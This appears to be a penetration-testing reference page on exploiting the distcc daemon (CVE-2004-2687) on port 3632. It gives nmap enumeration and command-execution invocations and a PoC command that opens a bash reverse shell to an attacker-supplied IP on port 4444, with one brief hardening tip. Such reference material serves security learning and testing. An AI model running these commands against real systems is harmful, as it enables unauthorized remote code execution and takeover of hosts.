distcc
aka distccd
Distributed C/C++ compiler daemon on 3632. The classic CVE-2004-2687 lets an unauthenticated attacker pass shell commands through a fake compile job for remote code execution.
Ports
| Port | Proto | Notes |
|---|---|---|
3632 | tcp | distccd |
Fingerprint
- nmap distcc-cve2004-2687 confirms the daemon + vuln
- Service banner on 3632
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2004-2687 | Command execution via crafted compile job (unauthenticated) |
Exploitation primitives
- CVE-2004-2687: distccd runs attacker-supplied commands during a 'compile'
- Runs as the daemon user (often a low-priv user → then local privesc)
Overview
distcc on 3632 farms out compilation across hosts. The legacy daemon trusts the job it’s given and will run commands embedded in it.
Enumeration
Confirm the daemon and the vuln:
nmap -p3632 --script distcc-cve2004-2687 <TARGET>RCE (CVE-2004-2687)
Via the nmap script’s args:
nmap -p3632 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='id'" <TARGET>Or with the standalone PoC for a reverse shell:
python2 distcc_exec.py -t <TARGET> -p 3632 -c "bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1'"Hardening
Don’t expose distccd to untrusted networks; use --allow host lists and run it in an isolated build environment.